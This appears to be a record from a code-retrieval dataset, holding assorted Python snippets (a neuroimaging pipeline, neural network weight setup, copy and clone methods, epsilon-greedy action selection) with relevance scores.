\"\"\"\n \"\"\"\n Create xml file for BRAINSCut\n \"\"\"\n\n\n BFitAtlasToSubject = pe.Node(interface=BRAINSFit(),name=\"BFitAtlasToSubject\")\n BFitAtlasToSubject.inputs.costMetric=\"MMI\"\n BFitAtlasToSubject.inputs.maskProcessingMode=\"ROI\"\n BFitAtlasToSubject.inputs.numberOfSamples=100000\n BFitAtlasToSubject.inputs.numberOfIterations=[1500,1500]\n BFitAtlasToSubject.inputs.numberOfHistogramBins=50\n BFitAtlasToSubject.inputs.maximumStepLength=0.2\n BFitAtlasToSubject.inputs.minimumStepLength=[0.005,0.005]\n BFitAtlasToSubject.inputs.transformType= [\"Affine\",\"BSpline\"]\n BFitAtlasToSubject.inputs.maxBSplineDisplacement= 7\n BFitAtlasToSubject.inputs.maskInferiorCutOffFromCenter=65\n BFitAtlasToSubject.inputs.splineGridSize=[28,20,24]\n BFitAtlasToSubject.inputs.outputVolume=\"Trial_Initializer_Output.nii.gz\"\n BFitAtlasToSubject.inputs.outputTransform=\"Trial_Initializer_Output.mat\"\n cutWF.connect(SplitAvgBABC,'avgBABCT1',BFitAtlasToSubject,'fixedVolume')\n cutWF.connect(BABC,'outputLabels',BFitAtlasToSubject,'fixedBinaryVolume')\n cutWF.connect(BAtlas,'template_t1',BFitAtlasToSubject,'movingVolume')\n cutWF.connect(BAtlas,'template_brain',BFitAtlasToSubject,'movingBinaryVolume')\n cutWF.connect(BLI,'outputTransformFilename',BFitAtlasToSubject,'initialTransform')\n\n CreateBRAINSCutXML = pe.Node(Function(input_names=['rho','phi','theta',\n 'model',\n 'r_probabilityMap',\n 'l_probabilityMap',\n 'atlasT1','atlasBrain',\n 'subjT1','subjT2',\n 'subjT1GAD','subjT2GAD',\n 'subjSGGAD','subjBrain',\n 'atlasToSubj','output_dir'],\n output_names=['xml_filename','rl_structure_filename_list'],\n function = create_BRAINSCut_XML),\n overwrite = True,\n name=\"CreateBRAINSCutXML\")\n\n ## HACK Makde better directory\n CreateBRAINSCutXML.inputs.output_dir = \".\" #os.path.join(cutWF.base_dir, \"BRAINSCut_output\")\n cutWF.connect(BCM_Models,'models',CreateBRAINSCutXML,'model')\n cutWF.connect(BCM_Models,'rho',CreateBRAINSCutXML,'rho')\n cutWF.connect(BCM_Models,'phi',CreateBRAINSCutXML,'phi')\n cutWF.connect(BCM_Models,'theta',CreateBRAINSCutXML,'theta')\n cutWF.connect(BCM_Models,'r_probabilityMaps',CreateBRAINSCutXML,'r_probabilityMap')\n cutWF.connect(BCM_Models,'l_probabilityMaps',CreateBRAINSCutXML,'l_probabilityMap')\n cutWF.connect(BAtlas,'template_t1',CreateBRAINSCutXML,'atlasT1')\n cutWF.connect(BAtlas,'template_brain',CreateBRAINSCutXML,'atlasBrain')\n cutWF.connect(SplitAvgBABC,'avgBABCT1',CreateBRAINSCutXML,'subjT1')\n cutWF.connect(SplitAvgBABC,'avgBABCT2',CreateBRAINSCutXML,'subjT2')\n cutWF.connect(GADT1,'outputVolume',CreateBRAINSCutXML,'subjT1GAD')\n cutWF.connect(GADT2,'outputVolume',CreateBRAINSCutXML,'subjT2GAD')\n cutWF.connect(SGI,'outputFileName',CreateBRAINSCutXML,'subjSGGAD')\n cutWF.connect(BABC,'outputLabels',CreateBRAINSCutXML,'subjBrain')\n cutWF.connect(BFitAtlasToSubject,'outputTransform',CreateBRAINSCutXML,'atlasToSubj')\n #CreateBRAINSCutXML.inputs.atlasToSubj = \"INTERNAL_REGISTER.mat\"\n #cutWF.connect(BABC,'atlasToSubjectTransform',CreateBRAINSCutXML,'atlasToSubj')\n\n \"\"\"\n ResampleNACLabels\n \"\"\"\n ResampleAtlasNACLabels=pe.Node(interface=BRAINSResample(),name=\"ResampleAtlasNACLabels\")\n ResampleAtlasNACLabels.inputs.interpolationMode = \"NearestNeighbor\"\n ResampleAtlasNACLabels.inputs.outputVolume = \"atlasToSubjectNACLabels.nii.gz\"\n\n cutWF.connect(cutWF,'OutputSpec.atlasToSubjectTransform',ResampleAtlasNACLabels,'warpTransform')\n cutWF.connect(cutWF,'OutputSpec.t1_corrected',ResampleAtlasNACLabels,'referenceVolume')\n cutWF.connect(BAtlas,'template_nac_lables',ResampleAtlasNACLabels,'inputVolume')\n\n \"\"\"\n BRAINSMush\n \"\"\"\n BMUSH=pe.Node(interface=BRAINSMush(),name=\"BMUSH\")\n BMUSH.inputs.outputVolume = \"MushImage.nii.gz\"\n BMUSH.inputs.outputMask = \"MushMask.nii.gz\"\n BMUSH.inputs.lowerThresholdFactor = 1.2\n BMUSH.inputs.upperThresholdFactor = 0.55\n\n cutWF.connect(myLocalTCWF,'OutputSpec.t1_corrected',BMUSH,'inputFirstVolume')\n cutWF.connect(myLocalTCWF,'OutputSpec.t2_corrected',BMUSH,'inputSecondVolume')\n cutWF.connect(myLocalTCWF,'OutputSpec.outputLabels',BMUSH,'inputMaskVolume')\n\n \"\"\"\n BRAINSROIAuto\n \"\"\"\n BROI = pe.Node(interface=BRAINSROIAuto(), name=\"BRAINSROIAuto\")\n BROI.inputs.closingSize=12\n BROI.inputs.otsuPercentileThreshold=0.01\n BROI.inputs.thresholdCorrectionFactor=1.0\n BROI.inputs.outputROIMaskVolume = \"temproiAuto_t1_ACPC_corrected_BRAINSABC.nii.gz\"\n cutWF.connect(myLocalTCWF,'OutputSpec.t1_corrected',BROI,'inputVolume')\n\n \"\"\"\n Split the implicit outputs of BABCext\n \"\"\"\n SplitAvgBABC = pe.Node(Function(input_names=['in_files','T1_count'], output_names=['avgBABCT1','avgBABCT2'],\n function = get_first_T1_and_T2), run_without_submitting=True, name=\"99_SplitAvgBABC\")\n SplitAvgBABC.inputs.T1_count = 1 ## There is only 1 average T1 image.\n\n cutWF.connect(myLocalTCWF,'OutputSpec.outputAverageImages',SplitAvgBABC,'in_files')\n\n\n\n def printFullPath(outFileFullPath):\n print(\"=\"*80)\n print(\"=\"*80)\n print(\"=\"*80)\n print(\"=\"*80)\n print(\"{0}\".format(outFileFullPath))\n return outFileFullPath\n printOutImage = pe.Node( Function(function=printFullPath, input_names = ['outFileFullPath'], output_names = ['genoutFileFullPath']), run_without_submitting=True, name=\"99_printOutImage\")\n cutWF.connect( GADT2, 'outputVolume', printOutImage, 'outFileFullPath' )", "def compile(self):\n # create both networks\n self.q_network = self.create_model()\n # self.target_q_network = self.create_model()\n\n # set loss function in both \n adam = Adam(lr=1e-4)\n self.q_network.compile(loss=mean_huber_loss, optimizer=adam) \n # self.target_q_network.compile(loss=mean_huber_loss, optimizer=adam)\n \n # set the same weights for both initially\n # self.target_q_network.set_weights(self.q_network.get_weights())\n \n print self.q_network.summary()", "def rebuild(self):\n self.from_samples(self.samples)", "def __init__(self, inputSize, hiddenSize, outputSize, epochs = 100, debug = False):\n self.inputSize = inputSize\n self.hiddenSize = hiddenSize\n self.outputSize = outputSize\n self.epochs = epochs\n self.debug = debug\n\n #weights\n self.W1 = np.random.randn(self.inputSize, self.hiddenSize) \n self.W2 = np.random.randn(self.hiddenSize, self.outputSize)", "def copy_weights(copy_from: nn.Module, copy_to: nn.Module, polyak=None):\n if polyak is not None:\n for target_param, param in zip(copy_to.parameters(), copy_from.parameters()):\n target_param.data.copy_(polyak * param + (1 - polyak) * target_param)\n else:\n copy_to.load_state_dict(copy_from.state_dict())", "def clone(self):\n return _libsbml.Model_clone(self)", "def create_structure(self):\n\n float_type = numpy.dtype(theano.config.floatX).type\n\n layer_input = tensor.concatenate([x.output for x in self._input_layers],\n axis=2)\n # Pass rate is the probability of not dropping a unit.\n pass_rate = 1.0 - self._dropout_rate\n pass_rate = float_type(pass_rate)\n sample = self._network.random.uniform(size=layer_input.shape)\n mask = tensor.cast(sample < pass_rate, theano.config.floatX)\n # Multiply the output by the inverse of the pass rate before dropping\n # units to compensate the scaling effect.\n scale_correction = 1.0 / pass_rate\n scale_correction = float_type(scale_correction)\n self.output = tensor.switch(self._network.is_training,\n layer_input * scale_correction * mask,\n layer_input)", "def copy(self):\n G = WeightedGraph(self.V, self.edges.copy(), self.weights.copy())\n return G", "def __init__(self, layerNeurons, initialWeights = None, layerTypes=None, **kwargs):\r\n \r\n # Ensure that there is at-least one input and one output layer in the network\r\n assert len(layerNeurons)>1, \"At least one input layer and one output layer is needed\"\r\n \r\n # Get the total number of weights needed in the network\r\n totalWeightCount = NeuralNetwork.getSizeOfWeightVector(layerNeurons)\r\n \r\n # Initialise the weights with the initializer or random values\r\n if initialWeights is None:\r\n self.weights = np.random.uniform(-1/np.sqrt(layerNeurons[0]), 1/np.sqrt(layerNeurons[0]), totalWeightCount)\r\n else:\r\n assert len(initialWeights) == totalWeightCount, (\"Length of initial weight matrix incorrect. You need \"+str(totalWeightCount)+\" weights\")\r\n self.weights = np.array(initialWeights, dtype = np.float64) \r\n \r\n # create an empty array of layers\r\n self.layers = []\r\n layerBlockStart = 0\r\n \r\n if layerTypes is None or len(layerTypes)<(len(layerNeurons)-1):\r\n layerTypes=[NetworkLayer]*(len(layerNeurons)-1)\r\n \r\n for layerInputDimention, layerOutputDimention, layerType in zip(layerNeurons, layerNeurons[1:], layerTypes):\r\n # initialise each layer with its input and output dimentions and bi-directional pointers to the relivant weights\r\n layerBlockEnd = layerBlockStart+(layerInputDimention*layerOutputDimention)\r\n layerBiasEnd = layerBlockEnd+layerOutputDimention\r\n newLayer = layerType(layerInputDimention, layerOutputDimention, \r\n self.weights[..., layerBlockStart:layerBlockEnd], \r\n self.weights[..., layerBlockEnd:layerBiasEnd], **kwargs)\r\n self.layers.append(newLayer)\r\n \r\n layerBlockStart = layerBiasEnd\r\n \r\n # Tell the output later to use a different function to calculate the delta \r\n newLayer.calcDelta = newLayer.calcDeltaOutputLayer", "def copy(self):\n cls = self.__class__\n new_graph = cls.__new__(cls)\n new_graph._nodes = self._nodes[:]\n new_graph._node_wip = self._node_wip[:]\n new_graph._edges = self._edges[:]\n if self._sorted_nodes:\n new_graph._sorted_nodes = self._sorted_nodes[:]\n else:\n new_graph._sorted_nodes = None\n new_graph.predecessors = {}\n for key, val in self.predecessors.items():\n new_graph.predecessors[key] = self.predecessors[key][:]\n new_graph.successors = {}\n for key, val in self.successors.items():\n new_graph.successors[key] = self.successors[key][:]\n return new_graph", "def clone(self):\r\n obj = CylinderModel()\r\n obj.params = copy.deepcopy(self.params)\r\n return obj", "def copy(self):\n binCopy = Bin()\n binCopy.totalWeight = self.totalWeight\n binCopy.items = [item for item in self.items]\n return binCopy", "def copy(self):", "def copy(self, o=None):\n if o is None: o = self.__class__(self.project)\n o.scripts = [s.copy() for s in self.scripts]\n o.variables = dict((n, v.copy()) for (n, v) in self.variables.items())\n o.lists = dict((n, l.copy()) for (n, l) in self.lists.items())\n o.costumes = [c.copy() for c in self.costumes]\n o.sounds = [s.copy() for s in self.sounds]\n o.costume_index = self.costume_index\n o.volume = self.volume\n return o", "def build(self, input_shape):\n assert len(input_shape) == 4\n assert input_shape[1] == input_shape[2]\n self.out_channel = input_shape[3]\n # Create the weight vector\n self.W_shape = (input_shape[1], self.out_dim)\n if self.initial_weights is not None:\n self.set_weights(self.initial_weights)\n del self.initial_weights\n else:\n self.W = self.init(self.W_shape, name='{}_W'.format(self.name))\n self.trainable_weights = [self.W]\n self.built = True", "def copy_state_to_network(self):\n state = self.rigid_body_state\n\n state.position = self.transform.world_position.copy()\n state.orientation = self.transform.world_orientation.copy()\n state.angular = self.physics.world_angular.copy()\n state.velocity = self.physics.world_velocity.copy()\n # state.collision_group = self.physics.collision_group\n # state.collision_mask = self.physics.collision_mask\n self.rigid_body_time = WorldInfo.elapsed", "def test_deepcopy_not_shallow(self):\n mol_source = create_ethanol()\n mol_source.generate_conformers()\n\n mol_copy = copy.deepcopy(mol_source)\n\n assert mol_source._conformers is not mol_copy._conformers\n assert all(\n a is not b for a, b in zip(mol_source._conformers, mol_copy._conformers)\n )\n\n assert mol_source._atoms is not mol_copy._atoms\n assert all(a is not b for a, b in zip(mol_source._atoms, mol_copy._atoms))\n\n assert mol_source._bonds is not mol_copy._bonds\n assert all(a is not b for a, b in zip(mol_source._bonds, mol_copy._bonds))\n\n assert mol_source._hierarchy_schemes is not mol_copy._hierarchy_schemes\n assert all(\n a is not b\n for a, b in zip(mol_source._hierarchy_schemes, mol_copy._hierarchy_schemes)\n )\n\n assert mol_source._properties is not mol_copy._properties\n assert mol_source._partial_charges is not mol_copy._partial_charges", "def _basic_build(self, inputs_shape):\n\n d = inputs_shape[-1]\n h = self._real_units\n s = self._slots\n\n self._erase_W = self.add_variable(\n name=\"_erase_W\", shape=[d + h, h], initializer=self._kernel_initializer\n )\n self._erase_b = self.add_variable(\n name=\"_erase_b\",\n shape=[h],\n initializer=(\n self._bias_initializer\n if self._bias_initializer is not None\n else init_ops.constant_initializer(1.0, dtype=self.dtype)\n ),\n )\n\n self._reset_W = self.add_variable(\n name=\"_reset_W\", shape=[d + h, 1], initializer=self._kernel_initializer\n )\n self._reset_b = self.add_variable(\n name=\"_reset_b\",\n shape=[1],\n initializer=(\n self._bias_initializer\n if self._bias_initializer is not None\n else init_ops.constant_initializer(1.0, dtype=self.dtype)\n ),\n )\n\n self._add_W = self.add_variable(\n name=\"_add_W\", shape=[d + h, h], initializer=self._kernel_initializer\n )\n self._add_b = self.add_variable(\n name=\"_add_b\",\n shape=[h],\n initializer=(\n self._bias_initializer\n if self._bias_initializer is not None\n else init_ops.constant_initializer(1.0, dtype=self.dtype)\n ),\n )\n self.heads = self.add_variable(\n name=\"_heads\", shape=[s, d], initializer=self._kernel_initializer\n )\n\n self._beta = self.add_variable(\n name=\"_beta_no_reg\",\n shape=(),\n initializer=tf.compat.v1.constant_initializer(\n np.array([1.02]), dtype=np.float32\n ),\n )\n self._alpha = self.add_variable(\n name=\"_alpha_no_reg\",\n shape=(),\n initializer=tf.compat.v1.constant_initializer(\n np.array([0.98]), dtype=np.float32\n ),\n )", "def copy(self):\n dyn = type(self)(self._hyperparams)\n dyn.Fm = np.copy(self.Fm)\n dyn.fv = np.copy(self.fv)\n dyn.dyn_covar = np.copy(self.dyn_covar)\n return dyn", "def copy(self):\n dyn = type(self)(self._hyperparams)\n dyn.Fm = np.copy(self.Fm)\n dyn.fv = np.copy(self.fv)\n dyn.dyn_covar = np.copy(self.dyn_covar)\n return dyn", "def build_graph(self):\n\t\tself._create_placeholders()\n\t\tself._create_embedding()\n\t\tself._create_recurrent_layers()\n\t\tself._create_de_embedding()\n\t\tself._create_loss()\n\t\tself._create_optimizer()\n\t\tself._create_summaries()", "def _reconstruct(self, num_samples=None):", "def clone_zero(self):", "def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate):\n super().__init__(inputnodes, hiddennodes, outputnodes, learningrate)\n\n # link weight matrices, wih and who\n # weights inside the arrays are w_i_j, where link is from node i to node i to j in the next layer\n # w11 w21\n # w12 w22 etc\n self.wih = cupy.random.normal(\n 0.0, pow(self.inodes, -0.5), (self.hnodes, self.inodes))\n self.who = cupy.random.normal(\n 0.0, pow(self.hnodes, -0.5), (self.onodes, self.hnodes))\n\n #activation function is the sigmoid function\n self.activation_function = lambda x: 1 / (1 + cupy.exp(x) ** (-1))", "def _clone(self, memo):\n assert self not in memo, \"the object should not have been copied twice in this pass\"\n c = Library()\n memo[self] = c\n c._netlist = None\n c._data = deepcopy(self._data)\n\n new_definitions = list()\n for definition in self._definitions:\n new_definitions.append(definition._clone(memo))\n c._definitions = new_definitions\n\n for definition in c._definitions:\n definition._library = c\n definition._clone_rip_and_replace(memo)\n return c", "def get_final_reconstruction(self):", "def copy(self):\n cpy = LsGermsStructure(self.Ls, self.germs, self.prepStrs,\n self.effectStrs, self.aliases, self.sequenceRules)\n cpy.allstrs = self.allstrs[:]\n cpy.allstrs_set = self.allstrs_set.copy()\n cpy.unindexed = self.unindexed[:]\n cpy._plaquettes = {k: v.copy() for k, v in self._plaquettes.items()}\n cpy._firsts = self._firsts[:]\n cpy._baseStrToLGerm = _copy.deepcopy(self._baseStrToLGerm.copy())\n return cpy", "def copy(self):\n node_new = Node(self.state.copy(), self.parent, self.children.copy(), self.RRT, self.path_length)\n node_new.vs = self.vs.copy()\n node_new.RRT = self.RRT\n node_new.observed = self.observed\n node_new.observation_node = self.observation_node\n node_new.observation_area = self.observation_area\n\n return node_new", "def build_model(self):\n self.g12 = G12(conv_dim=self.g_conv_dim)\n init_weights(self.g12, init_type='normal')\n self.g21 = G21(conv_dim=self.g_conv_dim)\n init_weights(self.g21, init_type='normal')\n self.d1 = D1(conv_dim=self.d_conv_dim, use_labels=self.use_labels)\n init_weights(self.d1, init_type='normal')\n self.d2 = D2(conv_dim=self.d_conv_dim, use_labels=self.use_labels)\n init_weights(self.d2, init_type='normal')\n self.dreid = DSiamese(class_count=self.num_classes_market)\n\n g_params = list(self.g12.parameters()) + list(self.g21.parameters())\n d_params = list(self.d1.parameters()) + list(self.d2.parameters())\n dr_params = list(self.dreid.parameters())\n\n self.g_optimizer = optim.Adam(g_params, self.lr, [self.beta1, self.beta2])\n self.d_optimizer = optim.Adam(d_params, self.lr, [self.beta1, self.beta2])\n self.dr_optimizer = optim.Adam(dr_params, self.lr, [self.beta1, self.beta2])\n\n if torch.cuda.is_available():\n self.g12.cuda()\n self.g21.cuda()\n self.d1.cuda()\n self.d2.cuda()\n self.dreid.cuda()", "def add_compiled_structure(self, structure):\n if self not in structure:\n structure.add_key(self, tf.float32)", "def _build(self, s_in: Shape, s_out: Shape) -> Shape:\n self.head_module = BasicDartsAuxHead(init_pool_stride=3)\n return self.head_module.build(s_in, s_out.num_features())", "def clone(self):\n\n copy = self.__class__(self.name, self.data)\n\n copy.set_fixed_variables_from_pdf(self)\n \n return copy", "def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):\n\n self.params = {}\n self.params['W1'] = weight_init_std * \\\n np.random.randn(input_size, hidden_size)\n self.params['b1'] = np.zeros(hidden_size)\n self.params['W2'] = weight_init_std * \\\n np.random.randn(hidden_size, output_size)\n self.params['b2'] = np.zeros(output_size)", "def copy_me(self):\n signature = inspect.getfullargspec(OutputSettings.__init__)[0]\n settings = OutputSettings()\n for attr in signature:\n if hasattr(self.output_settings, attr):\n setattr(settings, attr, getattr(self.output_settings, attr))\n settings.initialize_log_file()\n\n # create new Hyperpipe instance\n pipe_copy = Hyperpipe(\n name=self.name,\n inner_cv=deepcopy(self.cross_validation.inner_cv),\n outer_cv=deepcopy(self.cross_validation.outer_cv),\n best_config_metric=self.optimization.best_config_metric,\n metrics=self.optimization.metrics,\n optimizer=self.optimization.optimizer_input_str,\n optimizer_params=self.optimization.optimizer_params,\n output_settings=settings,\n )\n\n signature = inspect.getfullargspec(self.__init__)[0]\n for attr in signature:\n if hasattr(self, attr) and attr != \"output_settings\":\n setattr(pipe_copy, attr, getattr(self, attr))\n\n if hasattr(self, \"preprocessing\") and self.preprocessing:\n preprocessing = Preprocessing()\n for element in self.preprocessing.elements:\n preprocessing += element.copy_me()\n pipe_copy += preprocessing\n if hasattr(self, \"elements\"):\n for element in self.elements:\n pipe_copy += element.copy_me()\n return pipe_copy", "def clone_rand(self):", "def __init__(self, inputSize, outputSize, hiddenSize): \n\n self.inputSize = inputSize\n self.outputSize = outputSize\n self.hiddenSize = hiddenSize \n \n # Initialize random weight with range [-0.5, 0.5]\n self.weight = np.matrix(np.random.uniform(-0.5, 0.5, (self.hiddenSize, self.inputSize)))\n\n # Initialize random bias with range [0, 1]\n self.bias = np.matrix(np.random.uniform(0, 1, (1, self.hiddenSize)))\n \n self.H = 0\n self.beta = 0", "def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate):\n \n super().__init__(inputnodes, hiddennodes, outputnodes, learningrate)\n\n # link weight matrices, wih and who\n # weights inside the arrays are w_i_j, where link is from node i to node i to j in the next layer\n # w11 w21\n # w12 w22 etc\n self.wih = numpy.random.normal(\n 0.0, pow(self.inodes, -0.5), (self.hnodes, self.inodes))\n self.who = numpy.random.normal(\n 0.0, pow(self.hnodes, -0.5), (self.onodes, self.hnodes))\n\n #activation function is the sigmoid function\n self.activation_function = lambda x: scipy.special.expit(x)\n\n pass", "def _build(self, s_in: Shape, s_out: Shape) -> Shape:\n self.head_module = BasicDartsAuxHead(init_pool_stride=2)\n return self.head_module.build(s_in, s_out.num_features())", "def clones(module, num_copies):\n return nn.ModuleList([copy.deepcopy(module) for _ in range(num_copies)])", "def __init__(self, netSize):\n\t\t\n\t\t# TRY THIS FOR RANDOM!\n\t\t#\n\t\t#\n\t\t#\n\t\t\n\t\tself.biases = [self.randomArray(i, 1) for i in netSize[1:]] # Biases do not exist for the first layer ! Those are inputs.\n\t\tself.netSize = netSize\n\t\t#Initialize Weights\n\t\t#This initializes the weights for each layer based on the size. The number of rows should be\n\t\t#the number of neurons for the current, and the number of columns should be the same as the number of neurons\n\t\t#in the next layer. There are no weights for the last layer. That's the output layer.\n\t\tself.weights \t\t = [self.randomArray(i, j) for i, j in zip(netSize[:-1], netSize[1:]) ]", "def __init__(self, in_features, out_features):\n \n ########################\n # PUT YOUR CODE HERE #\n #######################\n\n\n self.params = {'weight': 0.0001 * np.random.randn(out_features, in_features), 'bias': np.zeros((out_features, 1))}\n self.grads = {'weight': np.zeros((out_features, in_features)), 'bias': np.zeros((out_features, 1))}\n\n\n\n ########################\n # END OF YOUR CODE #\n #######################", "def compile_frozen_graph(self):\n pass", "def build_model():", "def build_model(self):\n for link in self.links:\n # if from neuron is input to graph, add it to input_neurons set\n if self.is_input_neuron(link.from_neuron_id):\n self.input_neurons.add(link.from_neuron_id)\n # add weight to neuron\n if link.to_neuron_id not in self.weights:\n self.weights[link.to_neuron_id] = []\n self.weights[link.to_neuron_id].append(link.weight)\n # add input to neuron\n if link.to_neuron_id not in self.connections:\n self.connections[link.to_neuron_id] = []\n self.connections[link.to_neuron_id].append(link.from_neuron_id)", "def build_layer(self) :\n inputsWithBias = self.input_count + 1\n self.weights = np.random.rand(inputsWithBias, self.node_count)\n self.weights_and_activations = (self.weights, self.activations)", "def deepcopy(D):\n D_copy = python_copy.deepcopy(D)\n D_copy.uid = Device._next_uid\n Device._next_uid += 1\n D_copy.name = D.name\n # Make sure _bb_valid is set to false for these new objects so new\n # bounding boxes are created in the cache\n for D in D_copy.get_dependencies(True):\n D._bb_valid = False\n D_copy._bb_valid = False\n\n return D_copy" ]
[ "0.64318305", "0.6379705", "0.6327976", "0.6265465", "0.6256646", "0.62523013", "0.61420536", "0.6140329", "0.613779", "0.61183465", "0.6103677", "0.6048058", "0.603064", "0.6028374", "0.60247666", "0.5962394", "0.5946479", "0.5925313", "0.590854", "0.5892423", "0.58535075", "0.58485365", "0.58153343", "0.578531", "0.5712303", "0.5709148", "0.5702827", "0.5700456", "0.5681707", "0.5677498", "0.56746936", "0.566185", "0.56482846", "0.5643006", "0.56197107", "0.56105244", "0.55867076", "0.5586644", "0.5562775", "0.55617195", "0.5560223", "0.55515635", "0.55493855", "0.5546479", "0.5538619", "0.5524977", "0.55159354", "0.5500507", "0.5490974", "0.5486679", "0.54717505", "0.5457607", "0.5457452", "0.5455699", "0.54553044", "0.545204", "0.5445465", "0.5435786", "0.54294205", "0.5425673", "0.5424056", "0.54209507", "0.54205316", "0.54195166", "0.54078424", "0.54040176", "0.53993016", "0.5397613", "0.53967273", "0.539157", "0.5390917", "0.53899854", "0.5383179", "0.5365998", "0.5365998", "0.5364521", "0.5360515", "0.53587717", "0.5345411", "0.5345407", "0.5339917", "0.5334387", "0.53255725", "0.5324529", "0.5324469", "0.5324327", "0.53192526", "0.53185767", "0.53172135", "0.5317109", "0.53114444", "0.5311341", "0.5306311", "0.5303181", "0.5302377", "0.5300252", "0.52966803", "0.5289496", "0.5287764", "0.52873456", "0.52863395" ]
0.0
-1
Predict movement of game controler where is epsilon probability randomly move.
def eps_greedy_action(self, phi, tabu): # increase counter of actions taken self.a_count += 1 # if within the initial buffer before learning starts, random action aval_actions = None if self.a_count < self.warmup: if len(tabu) > 0: # Remove tabu actions from list of available actions aval_actions = [a for a in self.actions if a not in tabu] action = self.random_action(aval_actions) return action, None elif (self.a_count == self.warmup) and self.verbose: print('learning starts') # evaluate Q(phi, a) for each action qvalues = self.Qmodel.predict(phi, batch_size=1)[0] # generate random value randn = np.random.uniform() # eliminate tabu values from possible actions to pick aval_actions = None if len(tabu) > 0: if randn < self.epsilon: aval_actions = [a for a in self.actions if a not in tabu] else: # Update Qs to low values to ensure they are not picked tabu_idx = [i for i in range(self.num_actions) if self.actions[i] in tabu] qvalues[tabu_idx] = -9999 # eps-greedy, select random action if randn < self.epsilon: action = self.random_action(aval_actions) a_i = self.action_str2idx(action) else: # select best action a_i = np.argmax(qvalues) action = self.actions[a_i] # update greedy parameter and action count self.epsilon *= self.discount_epsilon self.a_count += 1 return action, qvalues[a_i]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def predict_movement(self, data, epsilon):\n\n q_actions = self.model.predict(data, batch_size = 1)\n opt_policy = np.argmax(q_actions)\n rand_val = np.random.random()\n if rand_val < epsilon:\n opt_policy = np.random.randint(0, NUM_ACTIONS)\n return opt_policy, q_actions[0, opt_policy]", "def predict_movement(self, data, epsilon):\r\n q_actions = self.model.predict(\r\n data.reshape(1, 84, 84, NUM_FRAMES), batch_size=1)\r\n opt_policy = np.argmax(q_actions)\r\n rand_val = np.random.random()\r\n if rand_val < epsilon:\r\n opt_policy = np.random.randint(0, NUM_ACTIONS)\r\n return opt_policy, q_actions[0, opt_policy]", "def __random_movement(self):\n\t\tself.__steps += 1 \t\t# Increment after every frame\n\t\t# When __steps greater than threshold reverse the direction\n\t\t# and set threshold to a new random value\n\t\tif self.__steps >= self.__threshold_steps:\t\n\t\t\tif self.direction == 'RIGHT':\n\t\t\t\tself.move_left()\n\t\t\t\tself.direction = 'LEFT'\n\t\t\telse:\n\t\t\t\tself.move_right()\n\t\t\t\tself.direction = 'RIGHT'\n\t\t\tself.__threshold_steps = random.randint(25,50)\n\t\t\tself.__steps = 0\n\t\t# Confines the Donkeys movement to within the boundary \n\t\tself.__check_boundary()", "def after_move(self):\n self.epsilon -= self.epsilon_decay_rate\n self.epsilon = max(self.epsilon, self.epsilon_min)", "def action(self, observation, epsilon=0):\n if epsilon and epsilon>np.random.rand():\n return np.random.randint(self.action_shape)\n activations = super().predict(observation.observation)\n return np.argmax(activations)", "def update_parameter(self):\n\n if self.testing: # 1. No random choice when testing\n self.epsilon = 0\n else: # 2. Update parameters when learning\n if self.epsilon > 0.:\n self.epsilon -= 0.01\n\n return self.epsilon", "def determine_move_position(self):\n green_probs = []\n net_size = len(self.net)\n adjacents = self.net[self.current_pos].adjacents\n #Belief propagation:\n #Analyzes each position's probability of obtaining\n #green when measuring at a time t+1.\n for i in adjacents:\n accum = 0\n for j in range(0, net_size):\n distance = self.__get_distance(i-1, j)\n if distance == 0: #Probability of measure green at distance 0 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[0][0]\n elif distance == 1: #Probability of measure green at distance 1 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[1][0]\n elif distance == 2: #Probability of measure green at distance 2 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[2][0]\n elif distance == 3: #Probability of measure green at distance 3 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[3][0]\n else: #Probability of measure green at a distance >= 4 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[4][0]\n green_probs.append((i, accum))\n #Returns the position in which the probability of\n #obtaining green when measuring is the lowest.\n return min(green_probs, key=itemgetter(1))[0]", "def reward(self) -> float:\n return random.random() * 2 if self.cur_pos >= self.end_pos else -0.1", "def move(probability, motion, p_move):\n y, x = motion\n return p_move * (np.roll(np.roll(probability, x, axis=1), y, axis=0)) + (1. - p_move) * probability", "def epsilon_greedy_move(self):\n\n # get the current state\n state, _ = self.board.bit_board_representation()\n \n # choose the move to play\n is_exploring_move = False\n if random.random() < self.epsilon:\n # exploration\n action = self.board.random_move()\n is_exploring_move = True\n else:\n # exploitation\n action, _ = self.board.greedy_action_move(self.target_network)\n\n action_index = action\n if self.board.player == CONST.BLACK:\n action_index = action + 9\n \n # play the epsilon greedy move\n self.board.play_move(action)\n \n # add the experience to the experience buffer if the move was not an exploration move\n if not is_exploring_move:\n reward = self.board.reward()\n not_terminal = self.board.not_terminal_int()\n succ_state, succ_player = self.board.bit_board_representation()\n succ_legal_moves = self.board.legal_moves\n self.experience_buffer.add(state, action_index, reward, not_terminal, succ_state, succ_player, succ_legal_moves)", "def predict(self) :\n y_pred = np.dot(self.W.T,self.X_test) + self.b \n if self.thr!=-1 :\n y_pred[y_pred <= self.thr] = -1\n y_pred[y_pred > self.thr] = 1\n y_pred = y_pred.astype(\"int\")\n corr = 0\n for i in range(y_pred.shape[1]) :\n if y_pred[:,i]==self.y_test[:,i] :\n corr += 1\n accu = (corr / y_pred.shape[1])*100\n print(\"ACCURACY : {}\".format(accu))\n else :\n rmse = np.sqrt(np.sum(np.square(self.y_test - y_pred)) / y_pred.shape[1])\n print(\"RMSE : {}\".format(rmse))", "def act(self, observation):\n if np.random.random() >= self.epsilon:\n return np.argmax(self.expvalue)\n else:\n return np.random.randint(0, 9)", "def act(self, a_state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.n_actions)\n else:\n action_values = self.model.predict(a_state)\n\n return np.argmax(action_values[0])", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def _epsilon_greedy(self, info_state, legal_actions, epsilon):\n probs = np.zeros(self._num_actions)\n if np.random.rand() < epsilon:\n action = np.random.choice(legal_actions)\n 